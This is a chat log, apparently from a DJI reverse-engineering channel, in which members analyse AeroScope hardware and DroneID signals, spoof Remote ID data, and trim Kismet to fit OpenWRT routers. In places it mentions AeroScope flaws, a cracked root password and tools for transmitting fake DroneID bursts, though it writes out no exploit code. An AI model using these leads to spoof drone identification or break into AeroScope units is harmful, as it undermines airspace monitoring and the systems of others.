[2022-04-25 20:55:11] hostile : so you leave your shit up... power goes out cuz of mortar... on reboot you get ```'Dear Aeroscope owner: The certificate and key files for the Aeroscope unit #aeroscopeID# are expired so it cannot connect to the server now. Please contact with your DJI sales manager or DJI dealer to handle this problem. DJI will issue the new certificate file and key file if the annual maintain fee is paid. Public cloud server will automaticaly upload these issued files. After that you could update those to the unit remotely. Please send your question to aeroscope.support@dji.com if you have any for this certificate update. Thanks Aeroscope product team'```

[2022-04-25 20:55:29] hostile : "'Dear Aeroscope owner: The certificate and key files for the Aeroscope unit #aeroscopeID# are expired so it cannot connect to the server now. Please contact with your DJI sales manager or DJI dealer to handle this problem. DJI will issue the new certificate file and key file if the annual maintain fee is paid. Public cloud server will automaticaly upload these issued files. After that you could update those to the unit remotely. Please send your question to aeroscope.support@dji.com if you have any for this certificate update. Thanks Aeroscope product team'"

[2022-04-25 20:56:57] hostile : But as I said. I'll sit here with open arms, awaiting one of you to bring me a verified AeroScope user in Ukraine right now, that is unable to use their gear, becasue they claim DJI shut it down cuz Russians asked them to. Adam is easy for me to reach. We'll sort it quickly!

[2022-04-25 21:07:00] hostile : caveat: Keep in mind there have been rumored remotely exploitable vulnerabilities in Aeroscope, including the AMS (non mobile version) that could impact availability, and this has NOTHING to do with DJI itself, short of piss poor programming practices.

[2022-04-25 21:07:00] hostile : caveat: Keep in mind there have been rumored remotely exploitable vulnerabilities in Aeroscope, including the AMS (non mobile version) that could impact availability, and this has NOTHING to do with DJI itself, short of piss poor programming practices. (default passwords for DB's, and RF reachable vulnerabilities)

[2022-04-25 21:07:18] hostile : I'd LOVE to see a disabled Mobile unit. I challenge anyone to find one.

[2022-04-25 21:08:00] hostile : Find me an AMS unit that is currently unable to connect to the DJI cloud (or it's own private cloud instance) and i'll give you a cookie. Then we can let the real fun begin with regard to pushing for "help" fixing it.

[2022-04-26 02:28:39] leo : leo joined the channel.

[2022-04-26 11:29:26] pangjammy : pangjammy joined the channel.

[2022-04-26 14:14:15] hostile : Did anyone here with an AeroScope get a chance to test @proto's latest work? https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m ?

[2022-04-26 19:16:57] konraditurbe : Spoofing the phone GPS to troll remoteID packets: https://twitter.com/74ck_0/status/1518618306445520896

[2022-04-26 19:23:57] wavesahead : if folks here have pcaps for the normal wifi and also enhancedwifi drones, I do NOT need the droneinfo side of the beacom

[2022-04-26 19:23:59] wavesahead : beacon*

[2022-04-26 19:24:06] wavesahead : i do want the wifi frame only

[2022-04-26 19:24:15] wavesahead : feel free to PM me the pcaps as attachments

[2022-04-26 19:24:48] wavesahead : i can also write a small tool to filter out the droneinfo data with a placeholder and

[2022-04-26 19:24:54] wavesahead : remove anything personal

[2022-04-26 19:25:33] jan2642 : I've upgraded my M2 to V01.00.0770 to check if it would add the all-zero symbol. Nope, it's still not there:

[2022-04-26 19:27:08] jan2642 : As suggested by @atlantic, this was recorded with a much lower gain.This results in much cleaner QPSK dots:

[2022-04-26 19:33:34] atlantic : perfect constellation.

[2022-04-26 19:34:10] wavesahead : nice

[2022-04-26 19:37:24] hostile : https://www.dji.com/mobile/newsroom/news/dji-statement-on-sales-compliance-efforts

[2022-04-26 19:37:30] hostile : Top kek

[2022-04-26 19:38:42] jan2642 : The data still contains lots of zeros. Maybe because the thing wasn't flying (no props) but it had GPS and the motors were running. I hoped to have seen the 'purpose' in the payload but that's still not the case. In wifi this info is sent alternately in the beacons: a beacon with metrics and then a beacon with the info. Is that also the case with ocusync ? I haven't found a single one which had the purpose encoded in it.

[2022-04-26 19:52:49] atlantic : https://www.dji.com/mobile/newsroom/news/dji-statement-on-sales-compliance-efforts

[2022-04-26 19:53:44] atlantic : yes, once every five or so.

[2022-04-26 21:37:15] faineg : and i'll definitely write a story about it if it happens, lol

[2022-04-26 22:43:49] proto : good to know! I'm curious if we can put together a map of which drones actually use the all zeros symbol

[2022-04-26 22:59:56] wavesahead : the guy on twitter that posted some droneinfo v2 packet, with the crc

[2022-04-26 23:00:01] wavesahead : is he here?

[2022-04-26 23:23:20] proto : assuming for a moment that my frame generation and modulation code actually works, does anyone have a plan on how to generate "valid" flight paths? even just creating elevation, lat, and lon values would probably suffice right?

[2022-04-26 23:25:04] proto : what program is that? really nice to have the grid to denote symbols

[2022-04-26 23:27:28] proto : can a hackrf tx at 15.36 million samples per second? or will it be limited to even numbers like 15 Msps?

[2022-04-27 00:34:59] wavesahead : @proto ive done that already

[2022-04-27 00:35:29] wavesahead : requires proper calculation for bearing, etc. also can throw in pitch calculation

[2022-04-27 00:42:05] wavesahead : for elevation you mean altitude and barometric height? because without geodesics in the mix you cant fake the latter 100% accurately, but it is possible

[2022-04-27 05:08:13] atlantic : hackrf has a nasty dc spike when transmitting. consider upsamlling to 19.2 Msps and then use an offset.

[2022-04-27 05:09:17] atlantic : you can use SRTM elevation data.

[2022-04-27 07:08:09] wavesahead : indeed, but that does lock you down to having online access or an offline copy and pre-configuring the flight information. i have come up with some tricks to get around either requirement.

[2022-04-27 07:47:19] jan2642 : https://github.com/miek/inspectrum Since baudline was not working on my Mac (binary too old to be compatible) I looked for an alternative and found this.

[2022-04-27 23:42:53] prz3mk0 : prz3mk0 joined the channel.

[2022-04-28 01:50:19] hostile : https://www.whitehouse.gov/briefing-room/statements-releases/2022/04/25/fact-sheet-the-domestic-counter-unmanned-aircraft-systems-national-action-plan/

[2022-04-28 01:50:36] hostile :

[2022-04-28 20:15:11] hostile : Thanks to those of you that helped @proto get armed up with information to make an assertive OccuSync public proof of concept to go along side the existing ~enhancedwifi examples. https://www.theverge.com/2022/4/28/23046916/dji-aeroscope-signals-not-encrypted-drone-tracking

[2022-04-28 20:16:24] hostile : I know the current focus of DroneID as an application is Ukraine/Russia conflict. I'll maintain there are other privacy concerns in tow as well, they've been the same as 2017. It is good to get something proper on record, instead of propagation of bad info that DroneID was encrypted only for "good guys".

[2022-04-28 20:17:13] hostile : so thank you all for your continued discussion and help here. As usual we often wind up being the "source of truth" for DJI information. I'm glad that tradition is continuing.

[2022-04-28 20:18:35] hostile :

[2022-04-28 20:19:07] hostile : This also puts some other claims to rest that I've been pushing for more "accurate" claims to be made on.

[2022-04-29 03:38:10] quad808 : Beautiful job @hostile and crew!!

[2022-04-29 13:25:57] hostile : ya all did the bulk of the leg work! Proving it on EnhancedWifi was easy. You all's historic notes and hints as you went along in private and chose to share here were invaluable.

[2022-04-29 13:25:57] hostile : ya all did the bulk of the leg work! Proving it on EnhancedWifi was easy. You all's historic Occusync notes and hints as you went along in private and chose to share here were invaluable.

[2022-04-30 16:31:16] proto : note for those of you that use my `process_file.m` script: i changed it to be a truly normalized cross correlation where the scores are between 0.0 and 1.0 so you shouldn't have to deal with guessing the threshold. but, this comes at the cost of runtime. it's something like 10-100x slower now which sucks, but at least the scores make sense now.

[2022-05-01 04:54:40] hostile : lol who did this?

[2022-05-01 04:54:57] hostile : https://twitter.com/CVEnew/status/1520142170753277952

[2022-05-01 04:55:30] hostile : https://nvd.nist.gov/vuln/detail/CVE-2022-29945

[2022-05-01 04:57:24] hostile : https://www.tenable.com/cve/CVE-2022-29945

[2022-05-01 04:57:40] hostile : who ever did is hilarious, cuz is propagated everywhere. https://vuldb.com/?id.198726

[2022-05-01 04:57:40] hostile : who ever did is hilarious, cuz it propagated everywhere. https://vuldb.com/?id.198726

[2022-05-01 05:02:20] hostile : Anyone find any good OpenWRT devices for @~enhancedwifi ? I picked up two to play with tonight

[2022-05-01 05:02:28] hostile : https://openwrt.org/toh/tp-link/cpe510

[2022-05-01 05:02:36] hostile : https://openwrt.org/toh/tp-link/cpe210

[2022-05-01 05:03:01] hostile : they are same router just dedicated bands one for 2.4 an done for 5.8ghz

[2022-05-01 05:03:18] hostile : both should have ath9k

[2022-05-01 07:27:54] jan2642 : 8 MB of flash, that’s tight. I’ve quickly tried grepping through the OpenWRT codebase to find a device which could support both bands with ath9 but so far haven’t found one.

[2022-05-01 12:03:25] retina : retina joined the channel.

[2022-05-01 13:53:05] hostile : it is indeed! still working on slimming the image down.

[2022-05-01 13:53:08] hostile :

[2022-05-01 13:54:17] hostile : quick way to check is using the ath9k tag on their wiki.

[2022-05-01 13:54:18] hostile : https://openwrt.org/tag/ath9k?do=showtag&tag=ath9k

[2022-05-01 14:31:52] hostile : if I yank the kismet-tools there is room.

[2022-05-01 14:31:54] hostile :

[2022-05-01 14:33:06] hostile : I wonder if I can edit ./package/network/kismet-openwrt/kismet-tools/Makefile to remove some more things I don't need in the tools. all the log_tools for example

[2022-05-01 17:56:53] dragorn : you don't need any of the tools

[2022-05-01 17:57:06] dragorn : you can run them all elsewhere and process your log file

[2022-05-01 17:57:16] dragorn : you don't need any of the capture drivers except wifi

[2022-05-01 17:57:36] dragorn : you don't need the ADSB ICAO db

[2022-05-01 17:57:42] dragorn : arguably you don't need the IEEE DB

[2022-05-01 17:57:58] dragorn : your other option is to run it all as remote cap and just shove packets to kismet running on linux/mac/WSL

[2022-05-01 17:58:32] dragorn : in which case all you need is `kismet-capture-linux-wifi`

[2022-05-01 18:02:19] dragorn : it looks like the ath10k firmware in openwt isn't 5mhz capable

[2022-05-01 18:16:25] hostile : I wouldn't mind keeping the server UI, the kismet-tools seems to include it based on wording, but wasn't clear.

[2022-05-01 18:17:14] hostile : Was gonna see if this would do it

[2022-05-01 18:17:16] hostile : ```$ git diff diff --git a/openwrt/kismet-openwrt/kismet-tools/Makefile b/openwrt/kismet-openwrt/kismet-tools/Makefile index 39bca0d..da50c96 100644 --- a/openwrt/kismet-openwrt/kismet-tools/Makefile +++ b/openwrt/kismet-openwrt/kismet-tools/Makefile @@ -43,28 +43,12 @@ CONFIGURE_VARS += \ define Build/Compile $(MAKE) -C $(PKG_BUILD_DIR) \ LD="$(TARGET_CXX)" \ - tools/kismet_discovery \ - log_tools/kismetdb_clean \ - log_tools/kismetdb_dump_devices \ - log_tools/kismetdb_statistics \ - log_tools/kismetdb_strip_packets \ - log_tools/kismetdb_to_gpx \ - log_tools/kismetdb_to_kml \ - log_tools/kismetdb_to_pcap \ - log_tools/kismetdb_to_wiglecsv + tools/kismet_discovery endef define Package/kismet-tools/install $(INSTALL_DIR) $(1)/usr/bin $(INSTALL_BIN) $(PKG_BUILD_DIR)/tools/kismet_discovery $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_clean $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_dump_devices $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_statistics $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_strip_packets $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_gpx $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_kml $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_pcap $(1)/usr/bin/ - $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_wiglecsv $(1)/usr/bin/ endef ```

[2022-05-01 18:17:34] hostile : I wasn't sure what kismet_discovery was

[2022-05-01 18:18:21] hostile : will report back later. got some fam stuff atm

[2022-05-01 18:22:15] hostile : are there any confirmed ath10k firmwares elsewhere that do 5mhz? could just make a package for openwrt using it eh?

[2022-05-01 21:15:38] dragorn : you can ignore all of kismet_tools; it's assorted utilities

[2022-05-01 21:15:53] dragorn : 100% non-vital, 100% can be run on other systems to process logs elsewhere, etc

[2022-05-01 21:16:12] dragorn : kismet itself is going to be about 4.5-5 meg of binary, plus C++ libs

[2022-05-01 21:16:28] dragorn : just remote cap is going to be about 500kb or less

[2022-05-02 13:54:02] dragorn : the icao db is only for adsb; the manuf db is only for named manufacturers, so if you dont' care, that'll save you some room too, and kismet won't care if they're not present. They're compressed data files, but still take some room

[2022-05-02 15:45:16] skarzhevsky : Does anyone have a picture of a mobile aeroscope, what is inside it?

[2022-05-02 16:02:20] dkovar : https://flymotionus.com/product/aeroscope-mobile/

[2022-05-02 20:31:25] james0d0a : james0d0a joined the channel.

[2022-05-03 14:30:16] socializednerd : socializednerd joined the channel.

[2022-05-04 12:37:08] ostap :

[2022-05-04 12:48:22] tmbinc : From what I understand, it's basically "n" (8 or so?) LC1860 for OcuSync, n Wifi receivers, n Lightbridge modems.

[2022-05-04 12:48:58] tmbinc : All running an Aeroscope flavor. DDD has tp703 firmware

[2022-05-04 12:49:34] hostile : https://twitter.com/d0tslash/status/1191483305469890560?s=20&t=YjMxTAGn1sT7qyYGngyRRQ

[2022-05-04 12:51:21] hostile : @tmbinc yeah I've been wondering why no one has taken the aeroscope scanner firmware and a raw Occusync module and tried to make a RasPi utilize them for detections.

[2022-05-04 12:51:48] hostile : repurpose their own hardware just like they did for profit?

[2022-05-04 12:51:48] hostile : repurpose their own hardware just like they did for protit?

[2022-05-04 12:55:23] tmbinc : what device is this shell on? the embedded crystalsky thing?

[2022-05-04 13:24:15] hostile : TBH can't recall. Sounds about right though.

[2022-05-04 13:26:22] hostile : It is for here IIRC.

[2022-05-04 13:26:46] hostile : it has been so long I've forgotten all that shit. And long lost access to the Aeroscope I had in hand.

[2022-05-04 13:31:56] hostile : It was TI DM81xx based which you can see from the screenshot. Looks like they dragged some of the old DaVinci DM* tech they used in p3 & p4 series along into Aeroscope platform.

[2022-05-04 13:35:06] hostile : Kinda funny you can still see the DVR RDK remnants

[2022-05-04 13:41:42] hostile :

[2022-05-04 13:44:24] hostile : The DM810X TI EVM doesn't seem to exist anywhere at this point in time. Probably EOL, and ran out of stock, obsolete, etc.

[2022-05-04 13:47:23] hostile : https://web.archive.org/web/20171228214041/http://www.ti.com/tool/dvrrd?DCMP=DSP_dvr&HQS=dvr

[2022-05-04 13:47:48] hostile : ``` Texas Instruments offers low-cost, low-power, integrated multichannel reference designs featuring the Hybrid DVR (DVR/NVR) reference design based on the highly integrated TMS320DM816x and TMS320DM8107 DaVinci™ video processors. This single platform solution allows faster development at a reduced cost ```

[2022-05-04 13:48:06] hostile :

[2022-05-04 13:51:22] hostile : I think the CrystalSky that was attached was a separate device that spoke to this one?

[2022-05-04 13:51:45] hostile : https://docs.djicdn.com/Products+info/ZS600C_V2597.zip

[2022-05-04 13:52:02] hostile : the firmware for it is here ^

[2022-05-04 15:14:07] amh : amh joined the channel.

[2022-05-04 16:53:34] eseven : If ever lose it, root Password is in Aeroscope's Assistant Manual :joy:

[2022-05-04 17:50:54] hostile : at the time that hash was extracted & cracked there was no public manual, but that is hilarious they are like please, just FTP in as root. Lol

[2022-05-04 17:52:20] konraditurbe : Good stuff. https://twitter.com/GeeDawg55975157/status/1521419373990268928

[2022-05-04 17:56:46] hostile : good to see these tools proliferate. Everyone knows the commands been being used in private for a long time now. This will democratize the ability to do it quickly when in need. Good on those of you that helped ensure these tools were created. This is about the 3rd variant I have seen now.

[2022-05-04 17:58:33] hostile : Before validator mentioned here even... widely abused. https://dji-rev.com/dji-rev/pl/egxt1knyw3r68rawsfa5487nja

[2022-05-04 17:58:33] hostile : Before validator mentioned here even... widely abused. https://dji-rev.com/dji-rev/pl/rynocr6gs3bufmge8t6eicrq3o

[2022-05-04 17:58:33] hostile : Before validator mentioned here even... widely abused. https://dji-rev.com/dji-rev/pl/egxt1knyw3r68rawsfa5487nja

[2022-05-05 05:04:15] droneuser : Any places outside the US (and besides aerial armor) where one can purchase, not rent, a DJI AeroScope?

[2022-05-05 13:18:37] hostile : scroll to bottom of page... fill out form. https://www.dji.com/aeroscope

[2022-05-05 13:18:53] hostile : ``` Order DJI AeroScope Today DJI AeroScope is available for order through authorized DJI Dealers. Contact us below for the team to reach out. ```

[2022-05-05 13:29:52] hostile : Randomly noticed that Brendan Schulman personally wrote that original response on Aeroscope when Mike, D13 and I published the paper with help from the OG's here.

[2022-05-05 13:29:57] hostile : https://static1.squarespace.com/static/589e20c9197aea0415f0e930/t/5a25969de2c4831af40e12e0/1512412829908/DJI+Response+to+D13.PDF

[2022-05-05 14:00:55] stanlee :

[2022-05-05 14:01:03] stanlee : Hmmmm.....

[2022-05-05 14:07:14] hostile : another long forgotten oldie

[2022-05-05 14:07:18] hostile :

[2022-05-05 14:07:28] hostile : "What's In a Name?" A Call for a Balanced Remote Identification Approach.

[2022-05-05 14:10:05] hostile : “No other technology is subject to mandatory industry-wide tracking and recording of its use, and we strongly urge against making UAS the first such technology. The case for such an Orwellian model has not been made" - DJI

[2022-05-05 14:10:42] hostile : God damn their own words are dank as fuck

[2022-05-05 14:10:57] droneuser : Someone has a gun to Brendan’s head I swear (https://www.washingtonpost.com/national-security/2022/02/01/china-funding-drones-dji-us-regulators/)

[2022-05-05 14:10:57] droneuser : Someone has a gun to Brendan’s head I swear

[2022-05-05 14:11:10] hostile : ``` A networked solution also inherently raises the possibility that all UAS operations will be tracked and recorded for future unknown exploitation, including enforcement quotas or business espionage. A networked system is also susceptible to system-wide hacking, or the creation by detractors of false entries of drone operations that do not exist. ```

[2022-05-05 14:11:38] hostile : What a fucking 180 on presentation they did.

[2022-05-05 15:19:54] hostile : Slightly interesting list of folks that agreed with and those that did not agree with the proposal

[2022-05-05 15:19:54] hostile : https://www.faa.gov/regulations_policies/rulemaking/committees/documents/media/UAS%20ID%20ARC%20Final%20Report%20with%20Appendices.pdf

[2022-05-05 15:20:18] hostile :

[2022-05-05 15:21:28] hostile : @faineg you'll like this comment

[2022-05-05 15:21:35] hostile : ``` Under our legal system, the First Amendment autonomy for journalism takes precedence absent a government safety interest of the highest order. A system that requires all journalists using drones to file flight plans would, by definition, constitute the perpetual surveillance of journalists’ activities without a specific threat to safety. Such a system would be unconstitutional. ```

[2022-05-05 15:27:06] hostile : I'll also point out a few folks made fun of me for suggesting that packets be encrypted or signed, or SOME method of authorized reception occur. You may not know your history, but this sort of shit was proposed back in 2017 when the ruling was being sorted out. You can see the flow charts for this logic as presented by AriAscend in their UTM whitepaper.

[2022-05-05 15:28:35] hostile : note the clear difference in authorized vs unauthorized reception.

[2022-05-05 15:28:35] hostile : not the clear difference in authorized vs unauthorized reception.

[2022-05-05 18:04:55] dkovar : Several entities have plans to crowdsource and collect RemoteID data, similar to the various ADSB data crowdsourcing companies.

[2022-05-05 20:19:32] item1979 : item1979 joined the channel.

[2022-05-06 02:25:36] prz3mk0 : this doesn't work anymore or does it? specifically, in regards to MA2

[2022-05-06 03:07:04] hostile : also re: encryption suggestions. This was from AUVSI. https://www.auvsi.org/sites/default/files/AUVSI%20Remote%20ID%20Comments%20Final.pdf

[2022-05-06 03:07:33] hostile : ``` The FAA Should Recognize Clear Encryption and Tamper Resistance Standards as a Baseline for Compliance. ```

[2022-05-06 08:18:18] jpaxel : jpaxel joined the channel.

[2022-05-07 06:50:55] hostile : Real old shit off AWS showing the RealName lookup API.

[2022-05-07 06:53:25] hostile :

[2022-05-07 06:54:35] hostile :

[2022-05-07 06:55:39] hostile :

[2022-05-07 07:01:48] hostile : This is the original DroneID message format. Looks like they do have a "signed" version planned already.

[2022-05-07 07:03:35] hostile :

[2022-05-07 07:07:23] hostile :

[2022-05-07 07:07:55] hostile : Note the dude here ready to jam / shoot shit down? lol

[2022-05-07 07:08:22] hostile :

[2022-05-07 07:12:37] hostile : From this document.

[2022-05-07 07:13:41] hostile : ``` Shenzhen Public Security Bureau Airport Branch ```

[2022-05-07 07:14:25] hostile :

[2022-05-07 15:02:10] enigma2 : p

[2022-05-07 15:37:02] gujaratgary : gujaratgary joined the channel.

[2022-05-07 15:42:52] gujaratgary : madness

[2022-05-07 18:03:10] melk : melk joined the channel.

[2022-05-07 19:30:00] dragorn : So as far as I can tell from the wifi beacon tag droneid: 1 - the format originally in kismet that hostile and i did, and which was documented in the d13 paper, should be the IE 221 vendor (3 bytes), vendor subtype (1), 2 unknown bytes, report type (1), and if dji OUIs are a consistent length, 72 bytes, for a 79 byte tag payload. 2 - The "new" format, from the v2 python script discussed here, should be 221 vendor (3), subtype (1), unknown (2), report type (1), and 83 bytes of content. 3 - Devices like the spark and mavic air should be sending the legacy original packet since they never got a firmware update. However: Every pcap i have seen, including those from a mavic air and spark, are sending a 94 byte 221 IE tag for a flight record 0x10 droneid frame. I have *no* evidence of *any* system sending the original payload format, and nothing that properly matches the v2 "new" payload. At this point I have no evidence *either* decode is correct, except for the GPS location at the beginning of the packet, and am strongly considering nuking all of it from kismet except the in-air reported location because I see nothing to prove any of the rest of it is consistent or correct, and I've never seen anything from a modern device, period

[2022-05-07 22:13:41] hostile : someone gonna have to pony up buy some old drones, start em off on that initial firmware version and work up.

[2022-05-07 22:14:44] hostile : thx for that verbose explanation of our shortcomings in getting you good data @dragorn. I really wish this place hummed along like it used to.

[2022-05-08 01:49:48] ttmonster : djmonster joined the channel.

[2022-05-08 21:02:56] dragorn : Not anybodys fault, just how it seems to be. and it's not that it's bad data, it's legit data, it just does't line up w/ my understanding of the collective understanding of the content.

[2022-05-08 21:04:23] dragorn : I'm just unfortunately the one lots of ppl not related to this channel come to b/c they want it in kismet, and then I get stressed that I have no good way to provide that. :) I've told ppl elsewhere what I'd need to get the rf cap proto worked on, for instance, into kismet; lacking a rf drone myself I'm not personally super interested in trying to do a port of the rf code to a generic-case click-and-go droneid dumper in kismet, b/c i have no way to test if my changes work

[2022-05-09 13:52:51] hostile : has anyone seen hints that Skydio has began their own implementation of DroneID? Starting to get curious about how other vendors are testing things pre September's requirement. https://www.skydio.com/blog/understanding-faa-rule-on-remote-identification-drone/

[2022-05-09 13:56:38] hostile : They embed their "beacon" into the controller. https://fccid.io/2ATQRSMO5GV1/Internal-Photos/Internal-Photos-5302032.pdf

[2022-05-09 13:56:40] hostile : https://shop.skydio.com/products/skydio-2-plus-beacon

[2022-05-09 14:02:24] eseven :

[2022-05-09 15:27:40] hostile : Parrot seems to already have some support for EU as well. https://www.parrot.com/us/newsroom/parrot-freeflight-6.7.4-update

[2022-05-09 15:28:33] hostile :

[2022-05-09 15:40:41] dragorn : There's also 'opendroneid' tho i've seen some weird claims from them, and haven't seen a pcap

[2022-05-09 15:41:14] dragorn : Is parrot pure wifi? Happy to roll identifiers into kismet for it if we can get pcaps of whatever it sends. Going to assume it's an IE tag in the beacons, too

[2022-05-09 15:41:38] dragorn : b/c fun fact, a lot of sw can pull ie tags from beacons without monitor mode, or even root. `iw` scan results can dump raw beacon IE data, for instance

[2022-05-09 15:41:51] dragorn : I don't recall if there's a direct android API to get it yet, but it's definitely getable on other systems

[2022-05-09 15:44:18] dragorn : ```dragorn@carbon-9 ~ % sudo iw dev wlp0s20f3 scan -u ... Vendor specific: OUI 00:0c:43, data: 07 00 00 00 Vendor specific: OUI 00:0c:e7, data: 00 00 00 00 bf 0c b1 01 c0 33 2a ff 92 04 2a ff 92 04 c0 05 00 00 00 2a ff c3 03 01 02 02 Vendor specific: OUI 00:15:6d, data: 00 01 01 00 01 02 26 ec 81 06 e0 63 da 5a 28 91 ```

[2022-05-09 19:42:59] funnel : funnel joined the channel.

[2022-05-10 02:00:59] hostile : I'll see what I can find out @dragorn the question about their implementation came from someone wondering what other vendors plan do do by the Sept enforcement window.

[2022-05-10 12:51:12] mixeysan : mixeysan joined the channel.

[2022-05-10 20:42:53] deadnull : deadnull joined the channel.

[2022-05-11 16:11:35] tissy : Please may I ask what board is in the 3D printed case?

[2022-05-11 16:18:35] konraditurbe : embedded board that sends DUML command

[2022-05-11 16:20:07] tissy : Do you know which board perhaps? RPi Pico?

[2022-05-11 19:38:10] droneuser : is there a capture (fc32 or raw file) available of an OcuSync drone ID burst?

[2022-05-11 19:38:42] droneuser : and how long does a droneID signal burst on the same frequency before hopping? mine doesn't seem to hop at all

[2022-05-11 19:38:42] droneuser : and how long does a droneID signal burst on the same frequency before hopping?

[2022-05-11 22:49:16] tmbinc : https://twitter.com/tmbinc/status/1524521954287439872 FYI

[2022-05-11 22:51:43] hostile : Haven't seen inside in a long time!.

[2022-05-11 22:52:16] hostile : Also may be useful to check behavior of the hot food cut off point in Dji Fly app for Aeroscope settings. https://mavicpilots.com/threads/aeroscope-removed-from-dji-fly-1-4-12.117404/

[2022-05-11 22:54:39] tmbinc : Is there no way anymore to edit the flight purpose or ID?

[2022-05-11 22:59:20] hostile : I believe that is correct.

[2022-05-11 22:59:32] hostile : I wanna say Dji Fly 1.4.8 was last version, but unclear.

[2022-05-12 01:58:44] fredmicrowave : Is the DJI Fly app of the RC pro different ? Because as i mentioned before, I do have this aeroscope option on 1.5.4

[2022-05-12 06:04:28] atlantic : Googling on AR9342 from the tweet of @tmbinc, i found this board. This is what you want, OpenWRT + dual band + Atheros AR9342. Document dated 2016, do not know if it is still available.

[2022-05-12 06:07:00] atlantic : https://compex.com.sg/shop/embedded-board/802-11n-embedded-board/wpj342-2/

[2022-05-12 06:17:00] atlantic : What is the function of the Leadcore on the smaller board with the uart and can connector?

[2022-05-12 06:35:00] mgroberman : mgroberman joined the channel.

[2022-05-12 09:25:51] tmbinc : @atlantic it connects to "BIST antenna" so likely test pattern generation?

[2022-05-12 14:35:07] tmbinc : Can Aeroscope detect non-DJI drones as well? "DJI's AeroScope is able to quickly identify the vast majority of popular drones on the market today " - ... does that imply that the "vast majority of popular drones" are DJI drones or that Aereoscope can receive IDs from non-DJI drones? :thinking_face:

[2022-05-12 14:38:12] hostile : no

[2022-05-12 14:38:27] hostile : they are playing on their own market share in the wording

[2022-05-12 14:38:51] hostile : same shit our sales guys did at D13 that pissed me off 'we detect 90% of drones on market' riffing off DJI's claims to have 90% market share at that time.

[2022-05-12 14:40:30] tmbinc : lol

[2022-05-12 14:44:30] tmbinc : RF nerds - is the Aeroscope hardware in theory able to transmit?

[2022-05-12 14:45:06] tmbinc : The signal path appears to be very similar to a TX-enabled version (for example the BIST generator on the mainboard, or the path on a RC or UAV), but not sure if this applies up to the antenna

[2022-05-12 14:45:57] tmbinc : I understand there's currently no code that would do so, but I wonder if that was ever an intention, for example drone-supported forced RTH

[2022-05-12 14:47:51] hostile : absolutly able to tmbinc. Probably needs firmware flash for occusync, cuz we know it uses a "scanner" firmware. But shelled out on the linux subsystem I bet you could hit the wifi cards and transmit.

[2022-05-12 14:48:19] hostile : "for example drone-supported forced RTH" that is not trivial without some baked in backdoor encryption IMHO.

[2022-05-12 14:49:52] tmbinc : Yeah that would be the idea - have the drone receive a "signed magic packet" that would force RTH. (To be clear - I don't think this exists. I have not found anything like that in either FC firmware or S1 firmware. More thinking if that was ever an idea "to be implemented")

[2022-05-12 17:27:02] hostile : it would be implemented in china fwiw

[2022-05-12 17:27:11] hostile : and I'd seen wording to indicate as such

[2022-05-12 17:27:15] hostile : lemme find where I posted in past

[2022-05-12 17:28:12] hostile : I think it was part of UTMISS CAAC shit as I recall

[2022-05-12 17:29:27] hostile : Heh remember this agreement? https://www.faa.gov/aircraft/air_cert/international/bilateral_agreements/baa_basa_listing/media/China_BASA.pdf

[2022-05-12 17:30:28] hostile : here we go. https://twitter.com/d0tslash/status/1509555682047143940?s=20&t=u2HpX_jznJWtw07YjsUi0A

[2022-05-12 17:31:23] hostile : https://twitter.com/d0tslash/status/1509546323640467469

[2022-05-12 17:32:06] hostile : note how Government Authorities and Flight Control and Flight/Return / Landing and Flight Supervision all share a data connection.

[2022-05-12 17:32:10] hostile :

[2022-05-12 17:32:41] hostile :

[2022-05-12 17:32:57] hostile : "management commands from the government authorities, perform corresponding operations".

[2022-05-12 17:34:08] hostile : @tmbinc did you note teh "signed" support packet spec I shared from the "Supervisor" folder in the AWS dump?

[2022-05-12 17:34:29] hostile : https://dji-rev.com/dji-rev/pl/p394sbeq1frs9ytmzfqkwpjkwy

[2022-05-12 18:21:37] h_marshall : h_marshall joined the channel.

[2022-05-12 19:08:22] testuser00001 : testuser00001 joined the channel.

[2022-05-12 19:55:17] fredmicrowave : There would need some RF power amplifier for practical transmitting. Could be an external two-way booster, but I can see several unpopulated connectors and maybe PA´s on the left of this photo...

[2022-05-12 20:25:36] hostile : those make more sense when you see the stationary unit. https://manuals.plus/dji/as-f1800-aeroscope-stationary-unit-manual.pdf

[2022-05-12 20:25:36] hostile : those make more sense when you see the stationary unit. https://dl.djicdn.com/downloads/AEROSCOPE/20201130/Aeroscope_AS-F1800_User_Manual_EN_JP_v2.0.pdf

[2022-05-12 20:25:48] hostile :

[2022-05-12 20:26:05] hostile :

[2022-05-12 20:27:45] tmbinc : The unpopulated headers are for the reverse RX module. I didn't open them up but you can see that the other parts are populated

[2022-05-12 20:28:11] tmbinc : so basically one has 4 antenna inputs, and then feeds through the signal (probably 2.4GHz and 5GHz separately) to the other board

[2022-05-12 20:28:11] tmbinc : so basically one has 4 antenna inputs, and then feeds through the signal (probably 2.4GHz and 5GHz separately) to the other boards

[2022-05-12 21:51:04] fredmicrowave : Ok. I looked at the IC's patterns directly connected to the antennas and they have PCB heatsink pads, meaning they need to dissipate power, so I thought they may be amplifiers. Maybe just Gnd pads after all...

[2022-05-12 21:52:07] fredmicrowave : Or just arresters of protection stuff, for some of them at least.

[2022-05-13 14:47:21] hostile : Here is another account of AeroScope targeting of DJI gear. https://youtu.be/b166ecyNBCw?t=117

[2022-05-13 14:48:19] hostile : looksl ike he's holding some DJI gear in the footage.

[2022-05-13 15:30:19] fredmicrowave : I have found this one, different, and funny, in a way.... Can´t imagine what goes in their mind when they hear that noise... There is also many videos of drones using analog video link and simple osd´s ... They must be careful where the camera is pointing, or shut camera off and activate RTH... https://www.youtube.com/watch?v=XY6YjcUB_3I

